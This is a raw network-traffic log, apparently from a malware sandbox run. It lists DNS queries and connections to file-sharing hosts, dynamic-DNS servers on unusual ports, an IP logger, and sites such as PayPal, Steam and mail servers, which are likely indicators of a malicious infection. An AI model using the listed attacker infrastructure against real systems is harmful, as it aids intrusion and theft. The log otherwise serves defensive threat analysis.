US 8.8.8.8:53 www.finebb.net udp
RU 91.194.2.86:80 www.finebb.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 www.yf168vip.com udp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 api.ipify.org udp
US 173.231.16.77:80 api.ipify.org tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.shortfall.net udp
US 13.248.169.48:80 www.shortfall.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 91.92.254.7:80 91.92.254.7 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 tomwallner.icu udp
US 13.107.42.13:443 onedrive.live.com tcp
RU 185.185.69.247:80 tomwallner.icu tcp
US 8.8.8.8:53 iplogger.com udp
US 104.21.12.138:443 iplogger.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 www.tecverse.xyz udp
US 203.161.61.170:80 www.tecverse.xyz tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 185.185.69.247:80 tomwallner.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.hreeremaeps.com udp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 www.paypal.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 192.229.221.25:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 34.120.175.65:80 www.333vvs.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 clients12.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.xdeh02h.xyz udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 3.49.178.192.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 clients93.google.com udp
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:443 google.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 8.8.8.8:53 www.shopbons-mall.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 208.91.197.132:80 www.shopbons-mall.com tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.antsnav.com udp
US 104.21.79.64:80 www.antsnav.com tcp
US 8.8.8.8:53 gservicese.com udp
RU 91.215.85.63:2718 gservicese.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 64.79.21.104.in-addr.arpa udp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.ssongg10834.cfd udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.rolexreloj.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 18.235.103.19:80 www.rolexreloj.com tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 19.103.235.18.in-addr.arpa udp
BG 185.141.63.253:80 ewixgdb.ua tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.prescribedaddiction.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 192.229.221.25:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 server16.realupdate.ru udp
BG 185.82.216.96:443 server16.realupdate.ru tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 96.216.82.185.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 www.andersoonwindows.com udp
RU 91.215.85.63:3839 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
IT 81.17.18.196:80 www.andersoonwindows.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 196.18.17.81.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 www.zen-borabora.com udp
IE 52.212.52.84:80 www.zen-borabora.com tcp
US 8.8.8.8:53 84.52.212.52.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.xotikvpn.xyz udp
US 162.255.119.91:80 www.xotikvpn.xyz tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 91.119.255.162.in-addr.arpa udp
RU 193.37.71.22:80 193.37.71.22 tcp
FI 64.233.164.127:19302 stun1.l.google.com udp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 98.49.222.23.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
NL 23.222.49.98:80 api.steampowered.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.hupkeo.link udp
DE 91.195.240.19:80 www.hupkeo.link tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 19.240.195.91.in-addr.arpa udp
US 8.8.8.8:53 www.tecverse.xyz udp
US 203.161.61.170:80 www.tecverse.xyz tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
RU 91.215.85.63:2718 gservicese.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.ljwixsb.top udp
US 13.107.42.13:443 onedrive.live.com tcp
RU 185.172.128.100:80 185.172.128.100 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 files.catbox.moe udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 106.39.251.142.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 13.248.169.48:80 www.shortfall.net tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.1:443 twitter.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 1.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 www.tiltedjava.net udp
CA 108.181.20.37:443 files.catbox.moe tcp
FR 217.70.184.50:80 www.tiltedjava.net tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 50.184.70.217.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 api.922proxy.com udp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 94.71.67.172.in-addr.arpa udp
BG 185.141.63.253:80 ewixgdb.ua tcp
NL 23.222.49.98:443 steamcommunity.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 imap.ziggo.nl udp
NL 84.116.6.3:993 imap.ziggo.nl tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 129.153.80.87:8855 tcp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
US 104.244.42.194:443 api.twitter.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 imap.telfort.nl udp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 195.121.65.134:993 imap.telfort.nl tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 194.42.244.104.in-addr.arpa udp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 134.65.121.195.in-addr.arpa udp
US 8.8.8.8:53 www.a0zu3im002.cfd udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.cmmug.asia udp
US 172.67.167.215:80 www.cmmug.asia tcp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 215.167.67.172.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 194.49.94.152:50500 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.333vvs.com udp
US 8.8.8.8:53 xo.nate.com udp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
KR 203.226.254.20:443 xo.nate.com tcp
US 35.244.161.158:80 www.333vvs.com tcp
BG 185.141.63.4:1074 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 158.161.244.35.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 20.254.226.203.in-addr.arpa udp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
RU 91.215.85.63:5225 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
KR 203.226.254.20:443 xo.nate.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.248.169.48:80 www.shortfall.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 member.nate.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
KR 203.226.254.21:443 member.nate.com tcp
US 8.8.8.8:53 api.steampowered.com udp
NL 23.222.49.98:80 api.steampowered.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 208.91.197.132:80 www.shopbons-mall.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 21.254.226.203.in-addr.arpa udp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 m-api.nexon.com udp
JP 52.193.97.244:443 m-api.nexon.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.stericyclehq.com udp
US 8.8.8.8:53 244.97.193.52.in-addr.arpa udp
IT 81.17.18.196:80 www.stericyclehq.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:8118 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 35.244.161.158:80 www.333vvs.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 www.bord90-1us.click udp
US 188.114.97.0:80 www.bord90-1us.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 mail.xs4all.nl udp
NL 195.121.65.192:993 mail.xs4all.nl tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 192.65.121.195.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 flyawayaero.net udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 104.21.93.225:443 flyawayaero.net tcp
US 8.8.8.8:53 gobo25cl.top udp
US 8.8.8.8:53 redirector.pm udp
US 172.67.197.19:80 gobo25cl.top tcp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 northmuyaspropertyinvestment.com udp
US 194.49.94.85:443 redirector.pm tcp
US 104.21.35.235:443 potatogoose.com tcp
US 172.67.197.19:443 gobo25cl.top tcp
BG 91.92.243.139:80 91.92.243.139 tcp
TR 78.135.105.12:443 northmuyaspropertyinvestment.com tcp
US 8.8.8.8:53 yip.su udp
NL 185.26.182.111:80 net.geo.opera.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 188.114.96.0:443 yip.su tcp
US 104.20.68.143:443 pastebin.com tcp
US 188.114.96.0:443 yip.su tcp
MY 111.90.146.230:80 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 sl.himanfast.com udp
US 172.67.197.19:80 gobo25cl.top tcp
US 172.67.197.19:443 gobo25cl.top tcp
US 188.114.96.0:80 sl.himanfast.com tcp
US 8.8.8.8:53 www.dp-0912.com udp
US 8.8.8.8:53 thecrazymonkey.org udp
US 104.21.35.228:80 www.dp-0912.com tcp
US 194.49.94.85:443 redirector.pm tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
BG 91.92.243.139:80 91.92.243.139 tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 228.35.21.104.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 steamcommunity.com udp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 194.49.94.152:50500 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 i.instagram.com udp
US 8.8.8.8:53 www.duadqps.com udp
FR 157.240.196.63:443 i.instagram.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 38.238.229.24:80 www.duadqps.com tcp
US 8.8.8.8:53 63.196.240.157.in-addr.arpa udp
BG 185.141.63.253:80 ewixgdb.ua tcp
US 8.8.8.8:53 www.gdyanjiu.icu udp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 8.217.92.5:80 www.gdyanjiu.icu tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 24.229.238.38.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
US 13.107.43.13:443 onedrive.live.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.gdyanjiu.icu udp
HK 8.217.92.5:80 www.gdyanjiu.icu tcp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
RU 193.37.71.22:80 193.37.71.22 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 work.a-poster.info udp
NL 37.1.217.172:25000 work.a-poster.info tcp
BG 185.141.63.4:1074 tcp
